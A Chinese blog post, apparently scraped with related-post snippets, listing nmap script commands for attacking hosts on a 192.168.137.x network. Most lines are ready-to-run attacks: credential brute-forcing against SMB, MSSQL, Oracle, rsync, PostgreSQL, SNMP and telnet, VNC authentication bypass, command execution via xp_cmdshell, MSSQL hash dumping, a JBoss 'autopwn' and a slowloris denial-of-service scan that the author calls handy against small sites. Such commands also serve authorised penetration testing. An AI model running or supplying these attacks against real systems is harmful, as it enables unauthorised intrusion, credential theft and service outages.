nmap的高级扫描option【原创收集】

(1) nmap --script=auth 192.168.137.*

负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令

(2)nmap --script=brute 192.168.137.*

提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

(3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.*

默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

(4)nmap --script=vuln 192.168.137.*

检查是否存在常见漏洞

(5)nmap -n -p445 --script=broadcast 192.168.137.4

在局域网内探查更多服务开启状况

检查vnc bypass

nmap  --script=realvnc-auth-bypass 192.168.137.4

检查vnc认证方式

1

nmap  --script=vnc-auth  192.168.137.4

获取vnc信息

nmap  --script=vnc-info  192.168.137.4

(2)smb扫描:

smb破解

nmap  --script=smb-brute.nse 192.168.137.4

smb字典破解

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

smb已知几个严重漏

nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4

查看共享目录

nmap -p 445  --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4

查看会话

nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

系统信息

nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

(3)Mssql扫描:

猜解mssql用户名和密码

nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

xp_cmdshell 执行命令

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4

dumphash值

nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4

扫描root空口令

nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4

列出所有mysql用户

nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

(5)Oracle扫描:

oracle sid扫描

nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5

oracle弱口令破解

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5

(6)其他一些比较好用的脚本

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关

nmap -p 873 --script rsync-brute --script-args ‘rsync-brute.module=www‘ 192.168.137.4  破解rsync

nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解

nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解

nmap -sU --script snmp-brute 192.168.137.4            snmp破解

nmap -sV --script=telnet-brute 192.168.137.4          telnet破解

nmap --script=http-vuln-cve2010-0738 --script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}‘ <target>  jboss autopwn

nmap --script=http-methods.nse 192.168.137.4 检查http方法

nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 ‘half-HTTP‘ connections

nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

nmap --script=smb-brute --script-args=userdb=/tmp/帐号字典.txt,passdb=/tmp/密码字典.txt IP地址 -p 445

给需要的朋友科普一下。

时间: 2024-12-19 18:52:57

nmap的高级扫描option【原创收集】的相关文章

nmap的高级扫描

(1) nmap --script=auth 192.168.137.* 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 (2)nmap --script=brute 192.168.137.* 提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解 (3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.* 默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

★Kali信息收集★8.Nmap :端口扫描

★Kali信息收集~ 0.Httrack 网站复制机 http://www.cnblogs.com/dunitian/p/5061954.html ★Kali信息收集~ 1.Google Hacking + Github Hacking http://www.cnblogs.com/dunitian/p/5074765.html ★Kali信息收集~2.Whois :域名信息 http://www.cnblogs.com/dunitian/p/5074768.html ★Kali信息收集~3.子

nmap 高级扫描用法

nmap提供了四项基本功能(主机发现.端口扫描.服务与版本侦测.OS侦测)及丰富的脚本库.Nmap既能应用于简单的网络信息扫描,也能用在高级.复杂.特定的环境中:例如扫描互联网上大量的主机:绕开防火墙/IDS/IPS:扫描Web站点:扫描路由器等等. 简要回顾Nmap简单的扫描方式:全面扫描:nmap-T4 -A targetip 主机发现:nmap-T4 -sn targetip 端口扫描:nmap-T4 targetip 服务扫描:nmap-T4 -sV targetip 操作系统扫描:nm

nmap隐藏自己扫描

192.168.1.216是zombie僵尸,192.168.1.212是被扫描端 nmap -sn 192.168.1.0/24  扫描在线主机 nmap -Pn -sI 192.168.1.216 192.168.1.212    (-Pn隐藏自己,-sI idle scan) IDS只能检测到192.168.1.216对192.168.1.212的扫描,不能检测到nmap主机的扫描.

怎样用 WPScan,Nmap 和 Nikto 扫描和检查一个 WordPress 站点的安全性

数百万个网站用着 WordPress ,这当然是有原因的.WordPress 是众多内容管理系统中对开发者最友好的,本质上说你可以用它做任何事情.不幸的是,每天都有些吓人的报告说某个主要的网站被黑了,或者某个重要的数据库被泄露了之类的,吓得人一愣一愣的. 如果你还没有安装 WordPress ,可以看下下面的文章. 在基于 Debian 的系统上: 如何在 Ubuntu 上安装 WordPress 在基于 RPM 的系统上: 如何在 CentOS 上安装 WordPress 我之前的文章 如何安

nmap命令-----高级用法

探测主机存活常用方式 (1)-sP :进行ping扫描 打印出对ping扫描做出响应的主机,不做进一步测试(如端口扫描或者操作系统探测): 下面去扫描10.0.3.0/24这个网段的的主机 1 nmap -sP 10.0.3.0/24 这个命令可以用于探测局域网有哪些机器 1 2 3 4 5 6 7 8 9 10 11 [[email protected] ~]# nmap -sP 10.0.3.0/24 Starting Nmap 5.51 ( http://nmap.org ) at 201

十条nmap常用的扫描命令

NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包. nmap是在网络安全渗透测试中经常会用到的强大的扫描器.功能之强大,不言而喻.下面介绍一下它的几种扫描命令.具体的还是得靠大家自己学习,因为实在太强大了. 1) 获取远程主机的系统类型及开放端口 nmap -sS -P0 -sV -O <target> 这里的 < target > 可以是单一 IP, 或主机名,或域名,或子网 -sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你

Mac 10.12高级防火墙pfctl教程收集(待实践)

在Mac 10.10之前使用ipfw.之后升级为pfctl.由于Mac自带的GUI防火墙只能针对软件进行放开,且无法针对特定端口入站及出站进行管理.所以使用pfctl能解决这类问题. 收集教程如下: http://man.linuxde.net/pfctl https://my.oschina.net/china008/blog/343049 http://blog.chinaunix.net/uid-20674714-id-90862.html https://cn2.chionlab.moe

java端口扫描(原创)

项目需要扫描占用的端口来判断服务是否启动,通过查资料发现大多数方法都是ServerSocket socket = new ServerSocket(port);代码如下: package com.frank.util; import java.io.IOException; import java.net.InetAddress; import java.net.Socket; import java.net.UnknownHostException; public class NetUtil